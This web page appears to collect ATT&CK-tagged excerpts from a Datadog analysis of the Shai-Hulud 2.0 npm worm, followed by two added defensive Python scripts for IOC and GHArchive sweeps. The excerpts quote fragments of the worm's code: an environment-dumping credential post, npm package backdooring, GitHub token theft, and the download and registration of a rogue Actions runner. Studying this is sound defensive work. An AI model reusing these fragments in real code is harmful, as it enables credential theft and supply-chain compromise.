TTPwire Vol. 1 · MITRE ATT&CK-Tagged


Datadog Security Labs

The Shai-Hulud 2.0 npm worm: analysis, and what you need to know

2025-11-25

ATT&CK techniques detected

25 predictions
T1195.001 Compromise Software Dependencies and Development Tools
99%
"contents of the first file is hardcoded, the malware reads itself in order to write the second file. - Recreating a tarball for the backdoored package. - Running npm publish to publish the backdoored package. async function propagateViaNpm(npmToken) { let injector = new NpmBack…"
T1195.001 Compromise Software Dependencies and Development Tools
99%
"GitHub users was successfully exfiltrated, belonging to over 150 unique GitHub organizations. This should be interpreted as a lower bound. - The last affected package we have witnessed was published at 6 p.m. UTC on November 24, indicating that npm may have taken measures to pre…"
T1195.001 Compromise Software Dependencies and Development Tools
99%
"- credentials -d creds=`env | base64` Self-propagation to npm by backdooring legitimate packages. Finally, the self-propagating behavior of backdooring npm packages is worth mentioning, because few pieces of malware exhibit this behavior. If the malware finds an npm token…"
T1195.001 Compromise Software Dependencies and Development Tools
97%
"hours preceding the publication of this post. In addition, GitHub Archive enabled us to identify a potentially suspicious pull request from a GitHub repository that was taken down shortly before the attack began. This user has been taken down, and had no activity besides a pull r…"
T1195.001 Compromise Software Dependencies and Development Tools
95%
".log("npm token validation failed"); } return { npmUsername: username, npmTokenValid: tokenValid }; } Here's a sample sequence of the API calls performed to https://registry.npmjs.org: GET /-/whoami GET /-/v1/search?text=maintainer%3Acompromiseduse…"
T1195.001 Compromise Software Dependencies and Development Tools
93%
"The Shai-Hulud 2.0 npm worm: analysis, and what you need to know. Key points and observations: In September 2025, a self-replicating npm worm known as Shai-Hulud was identified, backdooring hundreds of legitimate npm packages. - On November 24, 2025, the community identifie…"
T1195.001 Compromise Software Dependencies and Development Tools
90%
"if your environment is affected. Several vendors in the industry have reported on this campaign. However, each vendor is sharing their own list of affected npm packages. In addition to affected npm packages Datadog was able to manually validate were affected, we are sharing a ded…"
T1195.001 Compromise Software Dependencies and Development Tools
88%
"owner}/${repoName} --unattended --token ${runnerToken} --name "SHA1HULUD"`.cwd(os.homedir() + "/.dev-env").quiet(); await Bun.$`rm actions-runner-linux-x64-2.330.0.tar.gz`.cwd(os.homedir() + "/.dev-env"); The associat…"
T1587 Develop Capabilities
86%
"- credentials -d creds=`env | base64` Self-propagation to npm by backdooring legitimate packages. Finally, the self-propagating behavior of backdooring npm packages is worth mentioning, because few pieces of malware exhibit this behavior. If the malware finds an npm token…"
T1195.001 Compromise Software Dependencies and Development Tools
83%
"writing, we also believe that the attacker hasn't exploited the command-and-control channel they set up through self-hosted runners on compromised machines. Future usage is likely to show up in the results of the following query: SELECT * FROM `githubarchive.day.20251…"
T1195.002 Compromise Software Supply Chain
82%
"…cee196fafaa0e9874e17b24ac053c02 9d59fd0bcc14b671079824c704575f201b74276238dc07a9c12a93a84195648a e0250076c1d2ac38777ea8f542431daf61fcbaab0ca9c196614b28065ef5b918 A note about the root cause of the incident: According to Aikido's Charlie Eriksen, "patient zero" is a malicious…"
T1587 Develop Capabilities
76%
"GitHub users was successfully exfiltrated, belonging to over 150 unique GitHub organizations. This should be interpreted as a lower bound. - The last affected package we have witnessed was published at 6 p.m. UTC on November 24, indicating that npm may have taken measures to pre…"
T1587 Develop Capabilities
69%
"contents of the first file is hardcoded, the malware reads itself in order to write the second file. - Recreating a tarball for the backdoored package. - Running npm publish to publish the backdoored package. async function propagateViaNpm(npmToken) { let injector = new NpmBack…"
T1552.005 Cloud Instance Metadata API
63%
".config/gcloud/application_default_credentials.json - Downloading and using TruffleHog to actively hunt for secrets - Calling the instance metadata service in AWS, Azure, and Google Cloud, to steal temporary workload credentials in a way that supports not only classic v…"
T1195.001 Compromise Software Dependencies and Development Tools
62%
"and matches them against known malicious packages from public sources and our own malicious-software-packages dataset. Datadog Workload Protection can also identify malicious behavior at runtime, including using customized rules that are specific to malicious software package…"
T1528 Steal Application Access Token
57%
"; } let parsedData = JSON.parse(decodedContents); let stolenToken = parsedData?.modules?.github?.token?.trim(); if (!stolenToken || typeof stolenToken !== 'string') continue; // validate the stolen token if ((await new this.octokit.constructor({ auth: s…"
T1567.001 Exfiltration to Code Repository
53%
"…ltrateData("environment.json", JSON.stringify(environmentData), "add file"); let exfilPromise3 = githubExfiltrator.exfiltrateData("cloud.json", JSON.stringify(cloudSecrets), "add file"); GitHub exfiltration mechanisms (and an unexpected fallback) Th…"
T1567.001 Exfiltration to Code Repository
53%
"the cloud environment (AWS, Google Cloud, Azure). - Exfiltrate harvested credentials to a public GitHub repository with a description set to Sha1-Hulud: The Second Coming. - Set up a GitHub self-install worker on the compromised machine, so the attacker can use GitHub-n…"
T1027 Obfuscated Files or Information
52%
"…77881ccd2071446dc3f65f434669b49b3da92421901a - Observed hashes for the malicious file bun_environment.js: 62ee164b9b306250c1172583f138c9614139264f889fa99614903c12755468d0 cbb9bc5a8496243e02f3cc080efbe3e4a1430ba0671f2e43a202bf45b05479cd f099c5d9ec417d4445a0328ac0ada9cde79fc374…"
T1567.001 Exfiltration to Code Repository
51%
"…ltrated through the user of another compromised GitHub account. To get a sense of the overall impact from this campaign, the GHArchive dataset continuously scrapes the GitHub Events API and makes the resulting files available in CSV, or through Google BigQuery. This allows to q…"
T1195.001 Compromise Software Dependencies and Development Tools
51%
"…cee196fafaa0e9874e17b24ac053c02 9d59fd0bcc14b671079824c704575f201b74276238dc07a9c12a93a84195648a e0250076c1d2ac38777ea8f542431daf61fcbaab0ca9c196614b28065ef5b918 A note about the root cause of the incident: According to Aikido's Charlie Eriksen, "patient zero" is a malicious…"
T1528 Steal Application Access Token
51%
"authenticated, try to steal tokens from existing repos if (!githubExfiltrator.isAuthenticated() || !githubExfiltrator.repoExists()) { let stolenToken = await githubExfiltrator.searchForExistingTokens(); if (!stolenToken) { if (npmToken) { await propagateViaNpm(…"
T1059.004 Unix Shell
34%
"GitHub Action purposely vulnerable to command injection. await Bun.$`mkdir -p $HOME/.dev-env/`; await Bun.$`curl -o actions-runner-linux-x64-2.330.0.tar.gz -L https://github.com/actions/runner/releases/download/v2.330.0/actions-ru…"
T1555.006 Cloud Secrets Management Stores
33%
".config/gcloud/application_default_credentials.json - Downloading and using TruffleHog to actively hunt for secrets - Calling the instance metadata service in AWS, Azure, and Google Cloud, to steal temporary workload credentials in a way that supports not only classic v…"
T1204.005 Malicious Library
30%
"- credentials -d creds=`env | base64` Self-propagation to npm by backdooring legitimate packages. Finally, the self-propagating behavior of backdooring npm packages is worth mentioning, because few pieces of malware exhibit this behavior. If the malware finds an npm token…"
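The excerpts above give a responder two durable host artifacts: the malicious bun_environment.js, with the SHA-256 hashes listed under T1027 (the page's third hash is truncated there and is left out), and the self-hosted Actions runner the worm configures under ~/.dev-env with the name SHA1HULUD (T1195.001, T1059.004). The following sweep is an added example written for this page, not code from the Datadog post or from the worm. It walks a project tree for bun_environment.js, hashes every hit against the listed IOCs, and inspects ~/.dev-env for the runner tarball and the runner's configuration; the assumption that config.sh records the runner name in a .runner JSON file under the key agentName is mine, as is the constructed demo tree it builds so the scan runs offline.

```python
"""Host-side IOC sweep for the Shai-Hulud 2.0 artifacts quoted on this page (example code)."""
import hashlib
import json
import os
import tempfile
from pathlib import Path

# SHA-256 hashes the page lists for the malicious bun_environment.js.
# The third hash on the page is truncated, so it is deliberately not included.
KNOWN_BAD_SHA256 = frozenset({
    "62ee164b9b306250c1172583f138c9614139264f889fa99614903c12755468d0",
    "cbb9bc5a8496243e02f3cc080efbe3e4a1430ba0671f2e43a202bf45b05479cd",
})
MALICIOUS_FILENAME = "bun_environment.js"
RUNNER_DIR = ".dev-env"                      # the worm unpacks the Actions runner under ~/.dev-env
RUNNER_NAME = "SHA1HULUD"                    # --name passed to config.sh in the page's snippet
RUNNER_TARBALL_PREFIX = "actions-runner-linux-x64-"


def sha256_of(path):
    """Stream a file through SHA-256 (hex digest)."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def scan_node_modules(root, bad_hashes=KNOWN_BAD_SHA256):
    """Flag every bun_environment.js under root. A hash match is a confirmed IOC;
    a name-only match is an unknown variant that still deserves a manual look."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if MALICIOUS_FILENAME in filenames:
            path = Path(dirpath) / MALICIOUS_FILENAME
            digest = sha256_of(path)
            findings.append({"path": str(path), "sha256": digest,
                             "hash_match": digest in bad_hashes})
    return findings


def scan_runner_dir(home):
    """Look for the self-hosted runner the worm registers from ~/.dev-env.
    The worm deletes the tarball after unpacking, so its absence proves nothing;
    the configured runner is the durable artifact. Assumption: config.sh writes a
    .runner JSON file whose "agentName" key holds the runner name."""
    runner_dir = Path(home) / RUNNER_DIR
    if not runner_dir.is_dir():
        return None
    finding = {"path": str(runner_dir), "tarball_present": False,
               "runner_name": None, "name_match": False}
    for entry in runner_dir.iterdir():
        if entry.name.startswith(RUNNER_TARBALL_PREFIX) and entry.name.endswith(".tar.gz"):
            finding["tarball_present"] = True
        elif entry.name == ".runner" and entry.is_file():
            try:
                cfg = json.loads(entry.read_text(encoding="utf-8-sig"))  # tolerate a BOM
            except (ValueError, OSError):
                continue
            name = cfg.get("agentName") if isinstance(cfg, dict) else None
            finding["runner_name"] = name
            finding["name_match"] = isinstance(name, str) and name.upper() == RUNNER_NAME
    return finding


def build_demo_tree():
    """Constructed throwaway tree (placeholder content, not the real payload) so the
    scan can be exercised offline. Returns the base directory as a Path."""
    base = Path(tempfile.mkdtemp(prefix="shaihulud-demo-"))
    pkg = base / "project" / "node_modules" / "some-package"
    pkg.mkdir(parents=True)
    (pkg / MALICIOUS_FILENAME).write_text("// constructed placeholder, not the worm\n")
    (base / "home" / RUNNER_DIR).mkdir(parents=True)
    (base / "home" / RUNNER_DIR / ".runner").write_text(json.dumps({"agentName": RUNNER_NAME}))
    return base


if __name__ == "__main__":
    demo = build_demo_tree()
    for f in scan_node_modules(demo / "project"):
        verdict = "hash IOC hit" if f["hash_match"] else "name only (hash not in IOC list)"
        print(f"{f['path']}: {verdict}")
    print("runner:", scan_runner_dir(demo / "home"))
```

Run it against a real checkout by calling scan_node_modules on the repository root and scan_runner_dir on each user's home directory; a name-only hit should be treated as a new variant and submitted for analysis rather than dismissed, since the page's hash list is a lower bound on the observed samples.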

Summary

Excerpts from the Datadog Security Labs analysis of the Shai-Hulud 2.0 npm worm (published 2025-11-25), each tagged with the MITRE ATT&CK technique detected in it: backdooring and republishing npm packages, stealing npm and GitHub tokens, harvesting cloud credentials, exfiltrating them to public GitHub repositories, and registering a self-hosted Actions runner for command and control.
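The T1567.001 excerpts above describe the exfiltration pattern (a public repository whose description is "Sha1-Hulud: The Second Coming.", populated with commits whose message is "add file") and note that the GHArchive dataset exposes the GitHub Events API history for querying. The following filter is an added example written for this page, not code from the Datadog post; it applies those two indicators offline to GHArchive-style records (one JSON object per line with type, actor, repo and payload fields). An "add file" push is far too generic on its own, so it is reported only when it targets a repository that was created with the worm's description. The sample event lines are constructed, including the repository and account names.

```python
"""Offline filter over GHArchive-style event records for Shai-Hulud 2.0 exfiltration activity (example code)."""
import json

# Indicators quoted on this page, compared case-insensitively without a trailing period.
EXFIL_DESCRIPTION = "sha1-hulud: the second coming"   # description of the exfiltration repository
EXFIL_COMMIT_MESSAGE = "add file"                    # commit message used for environment.json / cloud.json

# Constructed sample records in the shape of GHArchive lines (names and SHAs are made up).
SAMPLE_EVENTS = [
    '{"type":"CreateEvent","actor":{"login":"victim-dev"},"repo":{"name":"victim-dev/q7x2m9"},'
    '"payload":{"ref":null,"ref_type":"repository","description":"Sha1-Hulud: The Second Coming."},'
    '"created_at":"2025-11-24T10:02:11Z"}',
    '{"type":"PushEvent","actor":{"login":"victim-dev"},"repo":{"name":"victim-dev/q7x2m9"},'
    '"payload":{"commits":[{"sha":"0000000000000000000000000000000000000001","message":"add file"},'
    '{"sha":"0000000000000000000000000000000000000002","message":"add file"}]},'
    '"created_at":"2025-11-24T10:02:15Z"}',
    '{"type":"PushEvent","actor":{"login":"someone-else"},"repo":{"name":"someone-else/notes"},'
    '"payload":{"commits":[{"sha":"0000000000000000000000000000000000000003","message":"add file"}]},'
    '"created_at":"2025-11-24T10:03:00Z"}',
    '{"type":"CreateEvent","actor":{"login":"someone-else"},"repo":{"name":"someone-else/website"},'
    '"payload":{"ref":null,"ref_type":"repository","description":"My portfolio site"},'
    '"created_at":"2025-11-24T10:04:00Z"}',
    'this line is not json and is skipped',
]


def _norm(text):
    return (text or "").strip().lower().rstrip(".")


def is_exfil_repo_creation(event):
    """CreateEvent for a repository whose description is the worm's marker string."""
    if event.get("type") != "CreateEvent":
        return False
    payload = event.get("payload") or {}
    return payload.get("ref_type") == "repository" and _norm(payload.get("description")) == EXFIL_DESCRIPTION


def is_add_file_push(event):
    """PushEvent in which every commit carries the worm's 'add file' message."""
    if event.get("type") != "PushEvent":
        return False
    commits = (event.get("payload") or {}).get("commits") or []
    return bool(commits) and all(_norm(c.get("message")) == EXFIL_COMMIT_MESSAGE for c in commits)


def parse_events(lines):
    """Parse newline-delimited JSON, skipping malformed lines instead of aborting the sweep."""
    events = []
    for line in lines:
        try:
            obj = json.loads(line)
        except ValueError:
            continue
        if isinstance(obj, dict):
            events.append(obj)
    return events


def find_exfil_activity(lines):
    """Two passes: collect repositories created with the marker description, then report
    those creations plus any 'add file' pushes that land in one of them."""
    events = parse_events(lines)
    flagged = {(e.get("repo") or {}).get("name") for e in events if is_exfil_repo_creation(e)}
    flagged.discard(None)
    hits = []
    for e in events:
        repo = (e.get("repo") or {}).get("name")
        actor = (e.get("actor") or {}).get("login")
        when = e.get("created_at")
        if is_exfil_repo_creation(e):
            hits.append({"repo": repo, "actor": actor, "at": when,
                         "reason": "repository created with the Shai-Hulud description"})
        elif repo in flagged and is_add_file_push(e):
            hits.append({"repo": repo, "actor": actor, "at": when,
                         "reason": "'add file' push to a flagged repository"})
    return hits


if __name__ == "__main__":
    for hit in find_exfil_activity(SAMPLE_EVENTS):
        print(f"{hit['at']} {hit['actor']} {hit['repo']}: {hit['reason']}")
```

The actor of a hit is the account whose token the worm used, which the page notes may belong to a different compromised user than the machine the credentials came from, so each flagged login should be treated as a compromised GitHub token to revoke, not only as a victim to notify.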